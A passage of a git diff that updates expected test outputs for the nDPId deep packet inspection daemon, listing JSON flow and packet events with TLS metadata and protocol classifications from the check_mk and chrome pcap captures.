+00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"check_mk_new.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1512031663734,"flow_last_seen":1512031663734,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1512031663734,"l3_proto":"ip4","src_ip":"192.168.100.22","dst_ip":"192.168.100.50","src_port":58998,"dst_port":6556,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"check_mk_new.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1512031663734,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1512031663734,"pkt":"RjIA9qTs8soKyPpECABFEAA8gwhAAEAGbgrAqGQWwKhkMuZ2GZzVcug3AAAAAKACchA4TQAAAgQFtAQCCAorDGs\/AAAAAAEDAwc="} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"check_mk_new.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1512031663734,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1512031663734,"pkt":"8soKyPpERjIA9qTsCABFAAA8AABAAEAG8SLAqGQywKhkFhmc5nZuqQJN1XLoOKAScSBJyAAAAgQFtAQCCAoWUVydKwxrPwEDAwc="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"check_mk_new.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1512031663734,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1512031663734,"pkt":"RjIA9qTs8soKyPpECABFEAA0gwlAAEAGbhHAqGQWwKhkMuZ2GZzVcug4bqkCToAQAOVJwAAAAQEICisMaz8WUVyd"} +00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"check_mk_new.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1512031663734,"flow_last_seen":1512031663736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":15,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1512031663736,"l3_proto":"ip4","src_ip":"192.168.100.22","dst_ip":"192.168.100.50","src_port":58998,"dst_port":6556,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"CHECKMK","breed":"Acceptable","category":"DataTransfer"}} +00700{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":98,"source":"check_mk_new.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":98,"flow_first_seen":1512031663734,"flow_last_seen":1512031663775,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":4096,"flow_tot_l4_payload_len":13758,"flow_avg_l4_payload_len":140,"midstream":0,"thread_ts_msec":1512031663775,"l3_proto":"ip4","src_ip":"192.168.100.22","dst_ip":"192.168.100.50","src_port":58998,"dst_port":6556,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"CHECKMK","breed":"Acceptable","category":"DataTransfer"}} 00558{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":98,"source":"check_mk_new.pcap","alias":"nDPId-test","packets-captured":98,"packets-processed":98,"total-skipped-flows":0,"total-l4-data-len":13758,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1512031663775} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 98/98 diff --git a/test/results/chrome.pcap.out b/test/results/chrome.pcap.out index e28828446..c9c0a2466 100644 --- a/test/results/chrome.pcap.out +++ b/test/results/chrome.pcap.out @@ -1,47 +1,47 @@ 00457{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"chrome.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00543{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"chrome.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1620902507870} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620902507870,"flow_last_seen":1620902507870,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620902507870,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64393,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1620902507870,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620902507870,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EvuJAbsdWbUDAAAAALAC\/\/8TEgAAAgQFtAEDAwUBAQgKM3SSOAAAAAAEAgAA"} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1620902507899,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620902507899,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7+4lEvFS6HVm1BKAS\/og8HwAAAgQFrAQCCAo6mxVSM3SSOAEDAwc="} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1620902507899,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620902507899,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EvuJAbsdWbUERLxUu4AQECxZJAAAAQEICjN0klQ6mxVS"} -00895{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620902507870,"flow_last_seen":1620902507899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1620902507899,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64393,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"aa50c12a5dfa717d9d6ab34e97de79d5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00936{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620902507870,"flow_last_seen":1620902507935,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1620902507935,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64393,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"aa50c12a5dfa717d9d6ab34e97de79d5","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"chrome.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620902508740,"flow_last_seen":1620902508740,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620902508740,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64394,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"chrome.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1620902508740,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620902508740,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EvuKAbtgbcSnAAAAALAC\/\/+8\/wAAAgQFtAEDAwUBAQgKM3SVkQAAAAAEAgAA"} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"chrome.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1620902508769,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620902508769,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7+4peZebaYG3EqKAS\/og23AAAAgQFrAQCCAo6mxi5M3SVkQEDAwc="} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"chrome.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1620902508769,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620902508769,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EvuKAbtgbcSoXmXm24AQECxT5gAAAQEICjN0lag6mxi5"} -00896{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"chrome.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620902508740,"flow_last_seen":1620902508769,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":635,"flow_avg_l4_payload_len":158,"midstream":0,"thread_ts_msec":1620902508769,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64394,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"1b73862eae8f1711440a446b1ef357fd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00935{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":49,"source":"chrome.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620902508740,"flow_last_seen":1620902508800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":895,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1620902508800,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64394,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"1b73862eae8f1711440a446b1ef357fd","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":74,"source":"chrome.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620902509272,"flow_last_seen":1620902509272,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620902509272,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64408,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"chrome.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1620902509272,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620902509272,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EvuYAbvjd2YSAAAAALAC\/\/+WlQAAAgQFtAEDAwUBAQgKM3SXeAAAAAAEAgAA"} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":75,"source":"chrome.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620902509273,"flow_last_seen":1620902509273,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620902509273,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64409,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"chrome.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1620902509273,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620902509273,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EvuZAbt3hYKuAAAAALAC\/\/\/l6gAAAgQFtAEDAwUBAQgKM3SXeAAAAAAEAgAA"} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":76,"source":"chrome.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620902509274,"flow_last_seen":1620902509274,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620902509274,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64410,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"chrome.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1620902509274,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620902509274,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EvuaAbt39JnFAAAAALAC\/\/\/OYgAAAgQFtAEDAwUBAQgKM3SXeQAAAAAEAgAA"} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":77,"source":"chrome.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620902509276,"flow_last_seen":1620902509276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620902509276,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64411,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"chrome.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1620902509276,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620902509276,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EvubAbvm4fjEAAAAALAC\/\/8AcwAAAgQFtAEDAwUBAQgKM3SXewAAAAAEAgAA"} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":105,"source":"chrome.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1620902509302,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620902509302,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7+5l1X2J5d4WCr6AS\/ojLGgAAAgQFrAQCCAo6mxrNM3SXeAEDAwc="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":106,"source":"chrome.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1620902509302,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620902509302,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EvuZAbt3hYKvdV9ieoAQECzoIAAAAQEICjN0l5M6mxrN"} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":107,"source":"chrome.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1620902509302,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620902509302,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7+5gJQMJ043dmE6AS\/oiH6wAAAgQFrAQCCAo6mxrLM3SXeAEDAwc="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":108,"source":"chrome.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1620902509302,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620902509302,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EvuYAbvjd2YTCUDCdYAQECyk8QAAAQEICjN0l5M6mxrL"} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":109,"source":"chrome.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1620902509302,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620902509302,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7+5p\/iAsOd\/SZxqAS\/ogA1gAAAgQFrAQCCAo6mxrMM3SXeQEDAwc="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":110,"source":"chrome.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1620902509302,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620902509302,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EvuaAbt39JnGf4gLD4AQECwd3QAAAQEICjN0l5M6mxrM"} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":112,"source":"chrome.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1620902509303,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620902509303,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7+5sh1fPg5uH4xaAS\/oinwwAAAgQFrAQCCAo6mxrPM3SXewEDAwc="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":113,"source":"chrome.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1620902509303,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620902509303,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EvubAbvm4fjFIdXz4YAQECzEywAAAQEICjN0l5Q6mxrP"} -00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":114,"source":"chrome.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620902509273,"flow_last_seen":1620902509303,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":635,"flow_avg_l4_payload_len":158,"midstream":0,"thread_ts_msec":1620902509303,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64409,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"1b73862eae8f1711440a446b1ef357fd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":115,"source":"chrome.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620902509272,"flow_last_seen":1620902509303,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":635,"flow_avg_l4_payload_len":158,"midstream":0,"thread_ts_msec":1620902509303,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64408,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"1b73862eae8f1711440a446b1ef357fd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":116,"source":"chrome.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620902509274,"flow_last_seen":1620902509304,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1620902509304,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64410,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"aa50c12a5dfa717d9d6ab34e97de79d5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":117,"source":"chrome.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620902509276,"flow_last_seen":1620902509304,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1620902509304,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64411,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"aa50c12a5dfa717d9d6ab34e97de79d5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00936{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":128,"source":"chrome.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620902509273,"flow_last_seen":1620902509333,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":895,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1620902509333,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64409,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"1b73862eae8f1711440a446b1ef357fd","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 